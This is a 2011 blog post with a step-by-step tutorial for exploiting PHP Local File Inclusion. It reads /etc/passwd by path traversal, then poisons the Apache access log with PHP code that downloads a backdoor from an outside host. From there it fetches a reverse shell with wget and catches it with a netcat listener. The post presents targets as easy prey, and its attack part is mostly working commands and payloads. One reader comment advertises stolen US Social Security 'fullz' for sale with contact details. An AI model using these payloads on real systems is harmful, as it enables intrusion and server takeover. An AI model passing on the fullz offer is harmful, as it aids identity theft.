Saturday, 5 March 2011

How to exploit LFI (Local File Include) vulnerability on webpages



Hi everyone, today will explain how to exploit LFI with PHP, there is loads of bad developers out there not doing their job properly, so there is plenty fish on the sea for this one :)
Little explanation : "In PHP, include(), require() and similar functions may allow the application developer to include an external PHP script in the running script. If it is possible for the user to control arguments to the include function, it may be possible for a malicious user to direct the vulnerable script to execute arbitrary code on the host server, allowing complete control of PHP execution on the host server.
The proper solution to this vulnerability is to modify the vulnerable code in order to prevent user control of file include directives.
A PHP include vulnerability may be partially mitigated in some cases by using PHP's allow_url_fopen and allow_url_include options in an effort to limit file inclusion to local files, but this may be evaded in some cases (e.g. by including Apache's logfile which may contain arbitrary PHP code)."

Ok, lets go to the interesting part.
This is our vuln test webpage : http://mytargettest.com/hacktest/lfi.php?page=contact.php
Now we can browse files on the remote server using that vuln by adding ../../../
So, if you want to read /etc/passwd , the URL will be http://mytargettest.com/hacktest/lfi.php?page=../../../../../../etc/passwd
Ok, now you wonder how can I exploit this? Well... there is many ways of doing it, my favorite is creating an evil entry in the apache access.log and then we retrieve the file and our evil code will be executed, ok, so now step by step:
0) Make your php_shell available on your pentest machine with the name back.txt , just rename your back_door_shell.php to back.txt, we will fetch this file in our attack, you can find one in your backtrack in
/pentest/backdoors/web/php-backdoor.php

1) Make sure you can access the file access.log, you can browse the server to find it, in my case is in /var/log/httpd/access.log
Browse it just to make sure you can read the file : http://mytargettest.com/hacktest/lfi.php?page=../../../../../../var/log/httpd/access_log

2) telnet mytargettest.com 80
and then type this : GET /<?php $z=fopen('shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>  

And hit ENTER 2x.
This will create an entry on access.log , now we need to read the file again and our php evil code will be executed

3) http://mytargettest.com/hacktest/lfi.php?page=../../../../../../var/log/httpd/access_log

4) Ok, now you should have a file create called shell.php

5) Now access your shell http://mytargettest.com/hacktest/shell.php

6) Upload your reverse shell or download it : wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell

7) Make your pentest server ready to recieve the connection from the target machine: nc -l -p 8080 -vvv

8) Give permission to your shell : chmod +x /tmp/airwolf_reverse_shell

9) Execute your reverse shell : /tmp/airwolf_reverse_shell

10) Done, you have real shell access to the server, have fun ;)

If you want to know more ways to exploit this, just post a comment!
Thanks for watching.

4 comments:

  1. Hello Angelo!

    I really enjoy your post. I was reading and (re)searching about this until I found your blog. Can we talk a little about this? I want to know more ways to exploit this, protect from it and talk about other things.

    Congratulations! ^^

    ReplyDelete
  2. Hello, Toscano, thanks for the comments, yes, we can, send me an email!

    Regards

    ReplyDelete
  3. Hello brother.,
    Can you teach me with TeamViewer
    please contact my email.,
    raska.marcel@gmail.com

    ReplyDelete
  4. Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete